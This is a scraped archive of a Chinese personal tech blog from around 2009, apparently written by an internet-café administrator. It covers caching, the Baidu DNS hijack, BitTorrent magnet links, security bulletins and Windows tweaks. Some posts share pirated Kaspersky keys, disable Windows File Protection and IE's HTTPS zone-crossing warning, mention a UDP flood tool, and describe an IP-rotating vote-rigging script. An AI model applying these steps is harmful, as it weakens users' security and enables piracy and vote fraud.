除了第一次访问必须读取硬盘,以后所有要用到的数据都是从内存中发出的,如果排除掉第一次读取,其他的缓存命中率几乎是100%,对这种超级服务器而言,唯一的瓶颈只是网络了,只要网络占用不超过2G(使用双网卡绑定),这个服务器不会感觉到有任何瓶颈,多少台机器都带的起,带的快!

综合以上数据,结论就是,网吧中那么多游戏里,那些需要被读取的数据仅仅不超过50G,而常常被读取的数据,也许连30G也不到.相信如果你有机会配置32G内存的服务器的话,除了第一次必须读取的数据,应该就可以获得近乎99%的命中率.在这种命中率下,任何硬盘都是可以胜任的,什么SSD,SAS统统靠边站,我只要最廉价的SATA就够了,内存大才是王道!

下一篇:选择合适的服务器
(未完待续)

百度再次被黑？追忆百度被黑的历史和现状

180045@163.com(毒药) — Wed,13 Jan 2010 10:00:16 +0800
      黑客与网站之间的“黑”与“反黑”也许并未触及到日常普通网民的生活，可能很多网民对于“黑”的概念并不深刻，但是如果有一天常去的网站登录不了了，更有甚者跳转到了莫名其妙的网站，可能在这个时候会让你深刻意识到“黑”这个恐怖的词汇。　　今天我们主角是中国的搜索巨头百度，百度作为中国乃至世界上众人关注的明星，当然会经常招来一些“牛人”“黑客”来大展身手，不过由于百度的巨大请求量使得“黑”这个工作非一人能做到。所以时至今日，中国的网民也会注意到，除登录缓慢等一些小故障之外，百度基本上没有大的问题。不过凡事都有例外百度在2006年9月及今天(2010年1月百度)遭到了巨大的无法访问事件，前者官方称被“黑客组织”袭击，后者官方目前没有回复，不过种种迹象表明百度的DNS遭遇劫持。下面就然我们重新了解一下这个两个事件。

　　一、2006年9月12日(17时30分至18时)——半小时

　　2006年9月12日傍晚5时30分左右，有北京  、重庆等地的网友称从当天17时30分开始，百度无法正常使用。在对百度服务器执行“Ping”命令时发现域名丢包率达到100%，返回了“请求超时”的信息。

　　随后，百度网站“www.baidu.com”，发现首页能正常登录，但搜索内容时，速度极慢，近10秒钟后网页最终出现无法显示的页面。在记者调查下，该时段，百度网站在北京  、重庆、广州、长沙等地，都出现无法访问的现象。直到下午6时，百度网站才恢复正常。

　　当天晚上11时37分，百度在其百度空间上发表声明，称遭受有史以来最大的不明身份黑客攻击。

　　百度声明称，12日下午，百度遭受有史以来最大规模的不明身份黑客攻击，导致百度搜索服务在全国各地出现了近30分钟的故障。从现象分析，这次大规模的攻击应该是有人有组织并精心策划的。百度将配合公安机关对此事进行调查。

　　尽管百度官方仅仅在官方做了简单的声明，但这长达半个小时的停机足以成为当时百度历史上最长的被黑时间。同时很多专业用户也开始质疑百度的防黑手段。

　　二、2010年1月12日(8时起，仍未修复)——两小时以上

      同样是12日不过时间跳转到了2010年1月，从早晨8时起，就有网友陆续反应百度挂掉了，事实上通过百度的IP仍然可以继续访问百度，但Baidu.com域名无法正常访问——有的直接现实无法访问，有的跳转到了伊朗的军网(网络盛传，伊朗黑客攻击百度的原因，据说是为了***早先中国网民在Twitter上对伊朗反对派的支持)，这些迹象表明Baidu.com和之前的Twitter.com遭遇了同样的事情，域名劫持。截止2010年1月12日10点发稿前Baidu.com仍然无法解析。
　　百度官方在DNS“崩溃”后的两个小时仍然没有对媒体发布声明，对于事件笔者稍后将做进一步报道。

　　文章小结：抛去2006年的“报复”性攻击，百度2010年可谓遭遇了真正的黑客组织，通过网络监控可以发现百度的DNS目前仍然被黑客和百度公司改来改去。拉锯正在持续——或许经此一劫后百度真的要认真审视一下自己的安全问题。(注：由于DNS解析的修改要一段时间才能实现，因此访问不了百度的用户可以暂时使用IP地址直接访问： 121.14.89.10)

卡巴斯基(KAV)7.0/8.0/9.0 KEY 授权文件(8月20号更新)

180045@163.com(毒药) — Sun,27 Dec 2009 19:04:08 +0800
KEY文件来源于网络收集整理：

卡巴斯基(KAV)7.0 KEY

卡巴斯基(KAV2009)8.0 KEY

卡巴斯基(KAV2010)9.0 KEY

附卡巴斯基(KAV)7.0导入教程：
1、先删除了之前被封的这个key，点击主界面的激活按钮，然后在右侧所画的红色区块的点击删除key，在弹出的对话框中点确定就可以删除被封的key。

2、删除后就出现要你激活的界面,这个和还没有导入key的界面是一样的，下面我们就要开始准备去导入key文件，点击上面图的安装授权的链接，就会弹出导入界面。

3、这里我们要点第三个，应用现有的授权许可文件(前提是你已下载了key文件)，如果你有激活码的话也是可以直接用第一个选项，点完第三选项会进入下个窗口。

4、点击浏览，找到你放key的地方，选择相应的卡巴斯基key就可以了（以前的版本需要把key放在英文目录下，但7.0-8.0的就不用了），选择完后再点下一步，激活成功了....

5、信息：

卡巴斯基全功能安全软件2010无效的激活码（任选一组）：

　　3SU15-S4AES-P5XRQ-87AKV　　　　　　3T6XS-GY8U1-W1JTR-9XAE1
　　3TK3J-6T1TN-X3XGP-HUZRN　　　　　　3TZV1-Z5F9W-DXBWX-Q1KDA

记得删除原来的KEY，再进行激活。

BT2.0时代是开始还是结束

180045@163.com(毒药) — Sun,27 Dec 2009 18:54:00 +0800
20世纪60年代，美国国防部高级研究计划署（ARPA）提出要研制一种崭新的、能够适应现代战争的、生存性很强的网络，目的是对付来自前苏联的核进攻威胁。翻看一下历史就能知道，苏联当时把全球第一颗人造卫星送上了太空，美国感觉到了压力，于是他们随后也搞出了另一个足以改变未来世界的东西——APRANET，当今互联网的雏形。APRANET的宗旨之一是去中心化，原因很简单，存在中央节点无异于存在致命节点，单点失效，将导致整个网络功能失效。

　　互联网上依靠中央节点才能正常工作的应用其实不在少数，比如我们再熟悉不过的BT。也许你会说：BT不是P2P下载吗？而P2P是没有中心节点的，我们所下载的文件实际上存放在每个网友的电脑中，像FTP这样的应用才是经典的中央节点应用——这话只说对了一半，BT是P2P应用没错，但如果说BT没有中心节点，不会出现“单点失效”，这种看法其实是错误的。

　　仔细想一想，BT真的不需要中心节点吗？如果是，那为什么国内BT站点关闭后会给下载BT资源带来不便，甚至出现BT客户端无法工作的情况？答案只有一个，BT并非一个去中心化的应用。那BT的“命门”在哪呢？也许你听说过BT Traker服务器。

    而这个BT Traker服务器也就是目前我朝有司大力打击BT下载站的重要和主要罪证之一，因为这个服务器的存在，且不管技术手段如何，从表面特征上看来，这些网站如同直接提供视频内容一样。正是因为这个服务器的存在，成了这些BT站点供认不讳的证据。滔天罪恶，证据确凿：“你们提供中心下载的服务器，上面全是未经许可的视频内容”。


                         关于世界最大BT资源分享网站海盗湾关闭Tracker服务器的消息

BT Traker服务器关闭将会产生怎样的后果？请看下图：

网友的回帖（海盗湾，BT江湖排名第一，Mininova排名第二）

海盗湾（The Pirate Bay），自称“世界上最大的BT分享网站”，是一个专门存储、分类及搜索BT资源的网站，同时它也运行着世界上最大的BT Tracker服务器。2008年11月15日，海盗湾称其规模已经达到了2500万独立Peers，注意不是种子，Peer可以认为是参与海盗湾“分享计划”的实际用户（电脑）数量，截至2009年12月，海盗湾注册用户已经达到400万，尽管下载资源是不需要注册的。但它的名声似乎不是很好，洛杉矶时报（Los Angeles Times）称其是世界上最大的非法下载辅助者（帮凶？）之一。

　　海盗湾正式成立于2004年10月，除了拥有辉煌的“业绩”，同时也麻烦缠身。根据记录，控告海盗湾的案件有34起之多，其中涉及音乐行业的21起、电影行业9起、游戏行业4起。2009年成为斗争最激烈的一年，2009年4月17日，瑞典斯德哥尔摩的法院以侵犯版权罪判处海盗湾4名创始人各1年的监禁，并处以约3000万瑞典克朗的罚金。

　　随后发生的事情更让人感觉BT的“大限”终于还是到了。11月17日，海盗湾决定永久关闭他们的Tracker服务器，12月初全球第二大BT服务网站Mininova删除了网站上大部分非法文件的BT Traker。Mininova表示，为了避免支付罚款，除了删除所有侵权文件的BT Traker之外，他们别无选择。

　　有人比喻，一个时代结束了，MPAA（美国电影协会）和RIAA（美国唱片行业协会）成了这场斗争的赢家。表面上看确实如此，在这场斗争中MPAA和RIAA最想“除掉”的就是BT Tracker服务器，而且他们做到了。

　　也许一个时代结束了，但BT时代真的结束了吗？答案是否定的。MPAA和RIAA“除掉”了BT Tracker服务器，卡死了当前BT工作方式的“命门”，但随着新技术的引入，BT Traker对于BT分享已经变得不再重要，甚至有些多余，事物的发展结果有时就像是开了一个玩笑，而这次的玩笑就开在了MPAA和RIAA身上。为什么会这样？想搞明白这些，我们必须先梳理一下BT分享的实现方式。

　　用户是怎样通过BT下载文件的？基本过程应该是这样：一、找到.torrent文件，二、使用BT下载客户端软件打开这个文件。三、对于用户来讲，只要花时间去等就可以了。

　　而对于客户端软件来讲，它会根据.torrent文件中的网址自动连接Tracker服务器，从它那里接收到其他正在下载该文件的人的网址名单。下一步，软件就一一与名单上的网址取得联系，从它们那里获取文件的片段，直到整个下载完成。从整个过程不难看出，BT Tracker服务器是一个中央节点，任何客户端都可以在其上找到“同伴”——只要其他人也在下载或分享同一个文件。所以MPAA和RIAA盯上了BT Tracker，因为消灭所有.torrent文件几乎是不可能的，但通过一些“努力”，消灭BT Tracker服务器则完全有可能实现。

　　官司赢了，一个时代结束了，我们不妨称其为是BT1.0时代，BT1.0时代致命的缺点是因为其存在中央节点，也就是BT Tracker服务器。然而，官司输了，并不代表整个BT时代的终结，一个新的时代已经悄然开始，我们可以称其为BT2.0时代。

    在BT2.0时代，Magnet（意译：磁铁、吸铁石）成为未来BT的发展方向，Magnet真的可以挽救BT吗？经笔者亲身试用，在支持Magnet URI之后，海盗湾似乎获得了新生，下载速度并非越来越慢，相反，速度表现让人满意。最关键的是，Magnet不需要Tracker服务器，也不需要.torrent文件，仅需要一串字符就可以进行文件下载。

                                               海盗湾LOGO与未来BT的“图腾”

                                       海盗湾上的BT资源已经加入了Magnet下载方式

                                 Worlds most resilient tracking. ——节选自海盗湾博客

博文的题目是“世界上最稳定的tracking”，文中提到：“随着DHT+PEX技术的不断成熟，发现对端（Peer）并协调通信已经变得容易实现，而Tracker服务器变得不再重要，甚至显得有些多余，所以我们将关闭服务器。”文中还说服务器现在被安置在了一家博物馆中。看来，关闭Tracker服务器是计划之内的事情。一切尽在掌握？

　　Tracker服务器和“BT种子”即将双双退役，取而代之的是DHT+PEX网络和Magnet Link，DHT网络是分布式存在的，所以不存在“被拔线”的问题，而Magnet Link仅是一串字符，所以也不再需要.torrent文件。这里出现了三个关键词：DHT、PEX和Magnet Link，这三点是未来BT的核心，下面我们就来说一说它们都可以实现怎样的功能。

　　DHT：2002年，纽约大学的两个教授Petar Maymounkov和David Mazières发表了一篇论文，提出了一种真正去中心化的“点对点”下载模型，他们将其称为Kademlia方法。2005年，BT软件开始引入这种技术，在BT中被称为DHT协议（Distributed Hash Table，分布式哈希表）。

　　DHT是一种分布式存储方法。DHT的作用是找到那些与本机正在下载（上传）相同文件的对端主机（Peer），当然，实现这一过程并不依赖Tracker服务器。在DHT网络中的每个客户端负责一个小范围的路由，并负责存储一小部分数据，从而实现整个DHT网络的寻址和存储。这种信息获取方式保证了整个网络没有单个的中心，即使一个节点下线，依然可以通过其他节点来获取文件，因此也就不需要Tracker服务器来告诉你，其他节点在什么地方。

　　PEX：是Peer Exchange的简写，我们可以将其理解为“节点信息交换”。虽然DHT解决了去中心化的问题，但要在没有“中心协调员”（Tracker）的情况下实现高效寻址，就要借助PEX。PEX所提供的功能有点类似于以前的Tracker服务器，但工作方式却非常不同，我们可以打个比方来说明。

　　小赵在A班，她不认识B班的小何，也不认识C班的小温，但小赵认识同班的小王，而小王认识B班的小何，也可能还认识C班的小温，或者小王仅认识B班的小何，但小何认识C班的小温，而小温又认识同班的所有同学，结果就是小赵可以“无限”地延伸自己的关系网，不管怎样，总有一条沟通途径可以将这些同学联系在一起，待小赵“认识”了小温后，他们就可以直接沟通了，在P2P世界里，就是进行上传与下载。

    　Magnet links：有网友将其称为磁链。DHT+PEX解决了BT“寻址”的问题，但是如何告诉BT客户端找（寻）什么又是另外一个问题。在.torrent文件中包含的内容就是用户真正要下载的文件的特征信息，或称为“电子指纹”，BT客户端知道了要找什么，也知道如何去找，于是P2P方式的下载、上传就实现了。以前BT客户端通过.torrent文件得知“要找什么”，现在，文件的“电子指纹”不再存放于.torrent中，而被放在了Magnet links中。

　　magnet:?xt=urn:btih:36684b463ca2aa2f9347b18e9f6b1a9090bdb073&dn=Microsoft+iSCSI+Initiator

　　上面是笔者打算下载的一个文件，Microsoft iSCSI Initiator，按照以前的方式，我们需要下载它的.torrent文件，然后才能下载这个文件本身。但是，在新的模式下，我们不需要下载.torrent文件，只需知道它的Magnet URI，一个资源定位信息，其他都不需要。只要把这个地址告诉下载软件，软件就会开始自动下载。

　　我们来分解一下这个地址：

　　magnet：协议名。

　　xt：exact topic的缩写，表示资源定位点。BTIH（BitTorrent Info Hash）表示哈希方法名，这里还可以使用SHA1和MD5。这个值是文件的标识符，是不可缺少的。

　　dn：display name的缩写，表示向用户显示的文件名。这是一个可选项。

　　tr：tracker的缩写，表示tracker服务器的地址。这是一个可选项，本例中并未出现。

　　精简一下上例，仅需要magnet:?xt=urn:btih:36684b463ca2aa2f9347b18e9f6b1a9090bdb073就够用了，如果附加dn（display name），在使用上会更加方便一些。

　　Magnet Link的好处就不用笔者多说了，至少包括两点：网络的可靠性得到了极大的增强；不存在“被拔线”的风险。由于不存在所谓的中央节点，审查将变得更加困难，“单点失效”的问题也就不存在了。此外，Magnet URI只是一个字符串，非常容易传播，根本无法禁止。因此，Magnet URI取代Tracker模式将是大势所趋，迟早会成为主流BT下载方式。

　　细心的网友可能看出了DHT+PEX+Magnet Link模式中的一个问题——BT客户端的“第一步是如何迈出的”，套用在介绍PEX时使用的例子，那就是小赵是怎么“加入”A班的呢？这确实是个问题。解决这个问题依然需要一台服务器（bootstrap node），不过这台服务器所起的作用与Tracker不同，它仅负责接纳小赵进入A班，当小赵与A班中的同学“搭上了话”，之后这台服务器就没有什么用处了。bootstrap node可以是不同BT客户端厂商独立运营的，也可以是几家联合共用，总之，它是分散的，只要在客户端软件中内置一张表单，那客户端就将有非常多的入口可供选择。

　　说了这么多，到底Magnet这块“吸铁石”表现如何？是骡子是马总要拉出来溜溜。于是笔者找来了目前已经支持Magnet的BT客户端µTorrent。


                                          BT客户端之一 µTorrent

　µTorrent是众多BT客户端之一，在安装过程中我们可以看到，它已经支持Magnet URIs

                             µTorrent下载BT资源，速度144.4KB/s


                                                      对端用户列表

    我们下载的资源来自海盗湾，所以对端资源都来自国外，如果有一天Magnet被彻底“本土化”，且用户量达到一定规模，其表现应该可以完全媲美传统的BT下载方式。看到这里相信您已经明白了，海盗湾为什么会乖乖地关掉他们的BT Traker服务器，看来这次MPAA和RIAA与海盗湾斗法虽然胜了第一回合，但接下来要如何对付DHT+PEX+Magnet Link模式，这应该是个比较让人头疼的问题。

    　放弃Tracker模式，改用Magnet，对于网友来讲几乎没有任何成本，仅需将当前BT软件升级即可，甚至连操作习惯都不会发生任何变化，因为你无需换用其它BT软件，在国内，比特精灵、比特彗星都已经开始支持Magnet。所以，您可能已经进入了BT2.0时代，只是您自己还不知道。

　　“我们并不提供实体下载资源，所有资源都是网友自发上传的……”相信您经常会听到类似的辩解，这句话看似有理，从技术角度讲也没有任何漏洞，但多少感觉属于狡辩。事物在不停发展，这就造成了监管上的缺失，待监管手段日趋完善时，事物可能又一次向前发展，导致监管手段再次落伍。新的BT分享方式将传统Tracker服务器所提供的功能进行了“分解”，所有BT用户成为Tracker服务器的一份子，核心消失了，在这种情况下，版权组织又该将反盗版的大棒挥向谁呢？

Windows7 简体中文旗舰版下载 (MSDN官方发布正式版原版镜像)

180045@163.com(毒药) — Fri,25 Dec 2009 04:27:29 +0800

本镜像为微软官方在MSDN上发布的Windows 7 RTM 正式版（旗舰版）的原版光盘镜像，不含任何杂质，刻盘收藏佳品！当然，由于是官方提供的镜像，所以不包含任何破解信息，如需激活的朋友可以下载相关的激活工具。
    本镜像安装完成后，C盘占用空间约7G左右，建议安装系统时系统分区至少设置20G，否则可能装点软件就没空间了。

文件名称：cn_windows_7_ultimate_x86_dvd_x15-65907.iso
文件版本：Windows7 简体中文旗舰版下载 (MSDN官方发布正式版原版镜像)
授权方式：官方正式版
文件大小：2.43GB
文件类型：ISO
发布时间：2009-11-14
MD5: 3BE75DF53E0CFB3905AF0B4F4471C9F3
SHA1: B589336602E3B7E134E222ED47FC94938B04354F
CRC32: E6FDF910

下载地址：迅雷下载本地下载

关于磐正AF520 ULTRA 的BIOS重置问题的解决方法

180045@163.com(毒药) — Fri,25 Dec 2009 04:09:10 +0800
      这个AF520 ULTRA与AF520T ULTRA都有同样的毛病，会自动恢复默认BIOS，以致开机时需要按F1跳过软驱项。
    以下是解决方法：更新BIOS，软驱选项默认为NONE，这两块主板共用BIOS。

     点击下载此文件

域名注册将不对个人开放

180045@163.com(毒药) — Fri,25 Dec 2009 03:51:15 +0800
CNNIC关于进一步加强域名注册信息审核工作的公告

为了提升域名注册信息的真实性、准确性、完整性，进一步加强域名注册信息审核工作，现通知如下要求：

1、用户向域名注册服务机构在线提交域名注册申请的同时，应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表（原件）、企业营业执照或组织机构代码证（复印件）、注册联系人身份证明（复印件）。

2、域名注册服务机构应当认真审核用户提交的书面申请材料，审核合格后，将书面申请材料通过传真或电子邮件的形式提交至我中心，并保留书面申请资料。

3、自域名提交在线申请之日起5日内我中心未收到书面申请材料的或域名申请材料审核不符合条件的，该域名将予以注销。

4、以上要求自2009年12月14日上午9时起施行。

如有疑问，请致电CNNIC，联系方式为：

7×24小时客服电话：010-58813100

邮件：service@cnnic.cn

中国互联网络信息中心

2009年12月11日

城市一角

180045@163.com(毒药) — Fri,25 Dec 2009 03:33:17 +0800
1P、

2P、

3P、

4P、

5P、

6P、

易游N/A轻松搞定！

180045@163.com(毒药) — Fri,25 Dec 2009 03:08:32 +0800
关于易游2008刻盘后，很多网吧出现N/A`现象，一台台手动安装麻烦，现在利用以下批处理，添加开机启动轻松解决！！

复制内容到剪贴板程序代码
@echo off
@title 易游2008 NA解决
cd c:\program files\e-yoo\
Rundll32 "c:\program files\e-yoo\drivercontrol.dll",InstIMFDRV

exit

以上内容保存为 system.bat 就可以了，客户机重启开保护状态下，重启1次就解决了N/A 问题了！

Adobe Flash Player 安全更新10.0.42.34 ActiveX for IE

180045@163.com(毒药) — Fri,25 Dec 2009 03:04:29 +0800
adobe在2009年12月8日更新了IE版的Flash Player ActiveX插件，以下为版本升级说明：

Security updates available for Adobe Flash Player
http://www.adobe.com/support/security/bulletins/apsb09-19.html
Critical vulnerabilities have been identified in Adobe Flash Player version 10.0.32.18 and earlier.  These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system.

Adobe recommends users of Adobe Flash Player 10.0.32.18 and earlier versions update to Adobe Flash Player 10.0.42.34.  Adobe recommends users of Adobe AIR version 1.5.2 and earlier versions update to Adobe AIR 1.5.3.

已确定在Adobe Flash Player 10.0.32.18及更早的版本存在关键的漏洞。这些漏洞可能导致应用程序崩溃，并可能允许攻击者控制受影响的系统。

Adobe建议的Adobe Flash Player 10.0.32.18用户和早期版本更新的Adobe Flash Player 10.0.42.34。 Adobe建议Adobe AIR的版本1.5.2及更早版本的用户更新的Adobe AIR 1.5.3。

引用内容
文件名称：Adobe Flash Player
文件版本：10.0.42.34
授权方式：正式版
文件大小：1.84 MB
文件类型：RAR
网吧用户可使用开机命令功能更新Flash插件版本，静默安装参数为Flash.exe /S
FLASH版本检测：
http://www.adobe.com/products/flash/about/
http://aw.awflasher.com/flashplayer/
发布时间：2009-12-11
下载地址： http://www.onlinedown.net/soft/14968.htm

Microsoft 安全公告摘要（2009 年 12 月）

180045@163.com(毒药) — Fri,25 Dec 2009 02:59:25 +0800
2009 年 12 月安全公告包含以下 6 个安全漏洞：

严重等级 3 个

1.MS09-071：Internet 验证服务内的漏洞可能允许远程执行代码 (974318)
http://www.microsoft.com/china/technet/security/bulletin/ms09-071.mspx

2.MS09-074：Microsoft Office Project 中的漏洞可能允许远程执行代码 (967183)
http://www.microsoft.com/china/technet/security/bulletin/ms09-074.mspx

3.MS09-072：Internet Explorer 的累积性安全更新 (976325)
http://www.microsoft.com/china/technet/security/bulletin/ms09-072.mspx

重要等级 3 个

1.MS09-069：本地安全机构子系统服务中的漏洞可能允许拒绝服务 (974392)
http://www.microsoft.com/china/technet/security/bulletin/ms09-069.mspx

2.MS09-070：Active Directory Federation Services 中的漏洞可能允许远程执行代码 (971726)
http://www.microsoft.com/china/technet/security/bulletin/ms09-070.mspx

3.MS09-073：写字板和 Office 文本转换器中的漏洞可能允许远程执行代码 (975539)
http://www.microsoft.com/china/technet/security/bulletin/ms09-073.mspx

Microsoft 安全公告摘要（2009 年 11 月）

180045@163.com(毒药) — Fri,25 Dec 2009 02:57:41 +0800
2009 年 11 月安全公告包含以下 6 个安全漏洞：

严重等级 3 个

1.MS09-063：Web Services on Devices API 中的漏洞可能允许远程执行代码 (973565)
http://www.microsoft.com/china/technet/security/bulletin/ms09-063.mspx

2.MS09-064：License Logging Server 中的漏洞可能允许远程执行代码 (974783)
http://www.microsoft.com/china/technet/security/bulletin/ms09-064.mspx

3.MS09-065：Windows 内核模式驱动程序中的漏洞可能允许远程执行代码 (969947)
http://www.microsoft.com/china/technet/security/bulletin/ms09-065.mspx

重要等级 3 个

1.MS09-066：Active Directory 中的漏洞可能允许拒绝服务 (973309)
http://www.microsoft.com/china/technet/security/bulletin/ms09-066.mspx

2.MS09-067：Microsoft Office Excel 中的漏洞可能允许远程执行代码 (972652)
http://www.microsoft.com/china/technet/security/bulletin/ms09-067.mspx

3.MS09-068：Microsoft Office Word 中的漏洞可能允许远程执行代码 (976307)
http://www.microsoft.com/china/technet/security/bulletin/ms09-068.mspx

天打雷劈的PUBWIN2009

180045@163.com(毒药) — Fri,25 Dec 2009 02:52:26 +0800
      强制性的安装到09，可是客户端0909的版本太垃圾，挂机锁居然能ALT+F4结束掉。FUC~K！强权啊，只能换0911版本的了，真是有气没处发泄！


利用易游安全设置与三层交换机防止内网攻击

180045@163.com(毒药) — Fri,25 Dec 2009 02:47:39 +0800
     不得不说的是，现在基于IE的0day越来越受到网管们的重视，配合着易游的系统更新功能就可以在第一时间内为机器打上补丁，所以牧马者们很聪明的换了另一种挂马方式——捆绑下载者的QVOD播放器堂而皇之地挂在他们所谓的视频网站上，网民们可不管你官方与非官方的，能看的到就行了，所以在这里推荐一种方法，洪水就洪水罢，跑不到路由上去。



      打开安全中心设置的基本设置，直接按上图所示设置，发送速率（就是客户机的上传速率）我这里限制了10M/S，于有盘来说是足够大了，而且对网络游戏无任何影响（家庭ADSL 2M也不过上传50K，也不见得会卡）。就算是无盘，理论上也不会影响回写，限于条件这里不作测试。
      经过上述设置后，若果有三层中心交换机的网吧也可以在交换机里设置端口的（进或入）速率，最大不要超过易游所限制的速率也就是100Mbps。
    实验证明：配置完成后，用UDP洪水攻击器攻击路由，易游会将客户机的上传速率自动限制成1M/S，路由里看LAN的上传流量也不过增加了10Mbps。只是有一点要说明的是，客户机的易游安全中心驱动一定要装上，服务端用户管理里能看到流量为准，不能出现NA，要不然，一切努力都是做的无用功。

记渐渐消散的BT网站

180045@163.com(毒药) — Fri,25 Dec 2009 02:26:22 +0800
时间：凌晨2点
地点：家
人物：毒药
习惯性的打开了www.CHDTV.net，一篇正文公告如下：
CHD联盟即日起关闭所有资源发布区
         鉴于当前形势，为了CHD联盟论坛的长久发展，经管理层研究决定：即日起停止CHD联盟在BBS的资源发布活动，所有资源发布区一律关闭。做出这样的决定，并非我们所愿，但是相信广大的CHD会员会理解论坛的决定，还是那句话：CHD因你而精彩！希望广大会员一如既往支持CHD联盟论坛的发展，积极参与论坛的各项活动，你的支持，就是我们继续发展的动力！
几天前我还在庆幸着这场BT风波没有波及到的CHD联盟也被迫着压力而撤消了所有的资源链接，无奈着再上《思路》去寻求慰藉，同样也是寥寥数十字结束了它多年来的使命。在此刻，我已经在想像着DVD盗版市场的再度兴起，带领着饱受困苦、饥不择食的网民们进行新一轮的电影革命。或许某年后的一天某君抱着480P的某枪版电影在TMD的某100英寸电视中啧啧称赞：俺天朝第一部引进的高清电影！就是高！让你丫恨的。
我的心情激动得不能自己，只能操他（她）。
出于学术研究的需要，我把“电影”两字拆了开来，研究了那么的一个60秒却也没发现这与BT存在着什么样的关连，电影依然照拍，导演继续潜规则。相反的说，我反而发现了BT网站的关闭居然能扩大内需，能带动经济发展，只是蓝光的普及程度太差，那号称1080P的LCD显示器又该拿什么噱头去唬人呢？
五毛说：“真相往往掌握在少数人的手中。”所以我们应该集合起大多数人的力量去威逼那少数人把真相透露。只是咱还有迅雷和电驴，在未到最后一刻，出于中华民族的传统，偶们还是很理智的看待着风波的蔓延。

QQ空间首次打开卡死的批处理

180045@163.com(毒药) — Fri,25 Dec 2009 02:23:07 +0800
QQ空间第一次打开卡，第2次就正常是因为IE连接数为1的时候。打开JS文件会出现卡死。注册表吧IE连接数改成32就可以了。

原理,：将 Internet Explorer 配置为可以同时下载多个文件（摘自microsoft.com的说明）

默认情况下，Windows Internet Explorer 7 及其早期版本会将同时可下载的文件数限制为 2 个。Windows Internet Explorer 8 将同时可下载的文件数限制为 8 个。此更改反映了现今多数用户通常拥有更快的连接速度。对于拨号连接，早期版本中的限制仍然适用。

若要将同时可下载的文件数增加至 10 个，请执行下列步骤：
启动注册表编辑器。
在注册表中找到以下项：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
在“编辑”菜单上，指向“新建”，单击“DWORD 值”，然后添加下面的注册表值：
数值名称：MaxConnectionsPer1_0Server
数值数据：10
基数：十进制

数值名称：MaxConnectionsPerServer
数值数据：10
基数：十进制

退出注册表编辑器。

因此，注册表内容为：

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]

"MaxConnectionsPer1_0Server"=dword:00000032
"MaxConnectionsPerServer"=dword:00000032

易游2009整合版IE首页-IE任我行

180045@163.com(毒药) — Mon,09 Nov 2009 19:22:00 +0800
      前几天听代理说易游09的虚拟磁盘比08的快多了，于是乎就装了一间黑吧练手。只是在装完之后我再发现09整合版的IE又被易游劫持了：用08权限的方法修改无效，退出管理端重新进入再是会改回易游的百度首页。
    呵呵，我的小聪明还是有点儿的——开管理端后setmenu.dat权限被改回EVERYONE写入，不就是CACSL么？！
    解决方法：
    1、删除C:\WINDOWS\SYSTEM32\CACLS.EXE
    2、建立假体文件夹CACLS.EXE，作空权限处理。
    3、若删除CACLS.EXE的时候提示文件保护，修改注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon键值，"SfcDisable"项设置为ffffff9d。
    额，还要建议易游一下，小动作不要搞了，狠点在主程序里判断setmenu.dat状态，改不回百度就Y的不运行，到时只能内存破解了，哈哈~

IE细节优化，关闭cookie提示，关闭弹窗提示，关闭安全链接提示

180045@163.com(毒药) — Mon,09 Nov 2009 19:07:14 +0800

复制内容到剪贴板程序代码
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]

#关闭cookie提示，典型效果就是第一次访问英雄宽频电影网时弹出的cookie提示。
"PrivDiscUiShown"=dword:00000001

#关闭弹出窗口提示，典型效果就是第一次访问163或其他带有弹出网页时的提示。
"FirstTime"=dword:00000000

#关闭跳转https连接的安全警告，典型效果就是登陆126邮箱时的安全提示。
"WarnOnZoneCrossing"=dword:00000000

ROUTEROS的VPN

180045@163.com(毒药) — Sat,24 Oct 2009 05:33:07 +0800
     某时，我们想看某网吧的电影、想拉点共享服务器上的文件~还有VPN借线（这边电信天下，借个毛线，双线和借线不在讨论范围。），除了装上远程控制还有什么方法？无疑做个VPN服务器就解决了所有问题。
   看图：
1、开启PPTP服务

2、建立Profile

这里要注意的是Local Address是VPN网关IP，Remote Address是VPN客户端IP，网段不能与网吧网段和你要连进VPN的那台机器网段相同，若是有多个客户端连接，建个IP地址池也行。

3、建立新Secret，Profile填写刚才那个

再在系统里新建一个网络连接，选择[连接到我的工作场所的网络]—[虚拟专用网络连接]，填写好IP......就是这么简单！

XP开启与关闭预读文件的比较

180045@163.com(毒药) — Wed,14 Oct 2009 03:42:30 +0800
      又小白了一回~错的很离谱！
      一直以来，我都很习惯的把Task Scheduler（计划任务）关闭——刚装完系统后就很理所当然的关了，直至某天到某网吧看到人家的PUBWIN客户端启动一闪而过就能输入卡号后，我被深深的震憾了！我就是那完全不折不扣的菜鸟：在那谁谁面前，我就整一小白。
    整整快了十多秒，为什么我逛楚哥的BLOG时就没有考虑过这个问题——为什么某些人事业很成功，其实也就是一线之间！
    ……NND！
    以下是实践过程，上面省去十万字的牢骚……
    配置：E4500，2G DDR667，P35主板
    不开启预读，滚动条1圈半，欢迎界面几秒后PUBWIN出现锁定框又几秒到了登陆界面又卡几秒。
    开启预读，滚动条3圈，欢迎界面一闪而过PUBWIN锁定框半秒，登陆界面直接能打卡号。
    按F8，选择WINDOWS XP ，同时进入系统，不开启预读出现指针快一秒，但至能输入卡号这过程慢了十多秒。
    ----------------------------------------------------------
      固步自封、不思进取，真的是太可怕鸟！
    趁着要换PUBWIN2009的档儿，我现在的做法：
    开启计划任务，激活预读，注册表HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters
      EnablePreretcher改为3，重启。
    把常用的QQ、IE等等乱七八糟的东西让它写进预读（服务已自动写入，还有易游和PUBWIN那些自启动的项目），再重启。
    关闭计划任务（为什么？？不知道）

自动投票系统

180045@163.com(毒药) — Thu,08 Oct 2009 03:23:19 +0800
      又是一件苦差事~那啥领导的小玩意总是建立在广大劳苦人民的身上。


         主要是用了IE.AU3的自定义UDF，检测CHECKBOX并选中，提交表单。还有就是用了rasdial.exe来建立ADSL连接。

腾讯QQ的 TXOPShow广告引起的假死问题解决

180045@163.com(毒药) — Sat,03 Oct 2009 17:58:16 +0800
